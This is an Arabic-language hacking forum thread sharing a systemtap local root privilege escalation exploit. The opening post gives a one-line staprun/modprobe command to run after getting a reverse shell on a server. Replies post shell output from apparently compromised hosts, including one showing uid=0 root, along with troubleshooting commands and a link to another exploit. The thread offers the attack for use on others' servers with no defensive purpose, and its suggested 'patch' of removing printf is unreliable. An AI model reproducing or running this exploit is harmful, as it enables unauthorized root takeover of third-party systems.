Local Root Privilege Escalation Vulnerability in systemtap

[b]بسم الله الرحمن الرحيم

السلام عليكم و رحمة الله و بركاته

[COLOR=DarkSlateGray]صدر مند اكثر من يومين ثغرة [/COLOR]بموقع exploit-db

هى ثغرة بالسيستم

تمنكنك من اخد صلاحيات الروت وماعليك اضافة الامر التالى بعد الاتصال العكسي بالسيرفر
[/b]


printf "install uprobes /bin/sh" > exploit.conf; MODPROBE_OPTIONS="-C exploit.conf" staprun -u whatever

[b]الثغرة ضبطت على اكثر من سيرفر وحتى لوكان اصدار 2010

اتمنى ان تجربوها بالتوفيق للجميع[/b]

–==Shell==–
printf “install uprobes /bin/sh” > exploit.conf; MODPROBE_OPTIONS=“-C exploit.co
nf” staprun -u whatever
/bin/bash: line 1: staprun: command not found
id
uid=32055(unigraf) gid=32057(unigraf) groups=32057(unigraf)

مخدمش يابروكس كاشما تشوف لينا حل من عندك

جرب ضع هاد الامر

ls -la /lib/modules/uname -r/systemtap

البرنامج المصاب غير مثبت لاحظ رسالة not found
staprun: command not found

على حد تعاملى مع الثغرة هى فى ال RedHat فقط
و يحتاج الامر Staprun يكون root root جروب و يوزر
و تصريح مش فاكر كام بصراحة غير كدة يعطى Permission Denied
لكنها فكرة جميلة وناجحة فىظروف خاصى
تحياتى

[b]اهلا حج Tr0y-x

وفيه ثغرة نزلت اليوم بس ما جربتها

http://1337db.com/exploits/15048

[/b]

يعطيك العافية خويا BrOx-Dz كان في بالى اجرب الثغرة و نتناقشوا فيها و سبقتنى ليها ddd .

الله ايوفقك .

الله يعافيك اخى نسيم

جربتها على أخر إصدار على توزيعة centos 5.1 قبل يومين ولم تنجح إنشاء الله تجي فرصة وجربها مرة أخرى

لم تعمل معي انا كذالك جربتها على اكثر من سرفر
اضن انها خاصة بال red hat وما جاورها

تشتغل على توزيعات الـred hat

هع هع

id
uid=0(root) gid=0(root) groups=32263(losdos)

شي جيد

ترقيع الثغره حذف امر

printf

سرفرات i868 فقط
اضن : )

printf “install uprobes /bin/sh” > exploit.conf; MODPROBE_OPTION
nf" staprun -u whatever
/bin/sh: line 3: /usr/bin/staprun: Permission denied
ls -la /lib/modules/uname -r/systemtap
ls: /lib/modules/2.6.34.6/systemtap: No such file or directory
0__0

sys.zip (2.39 KB)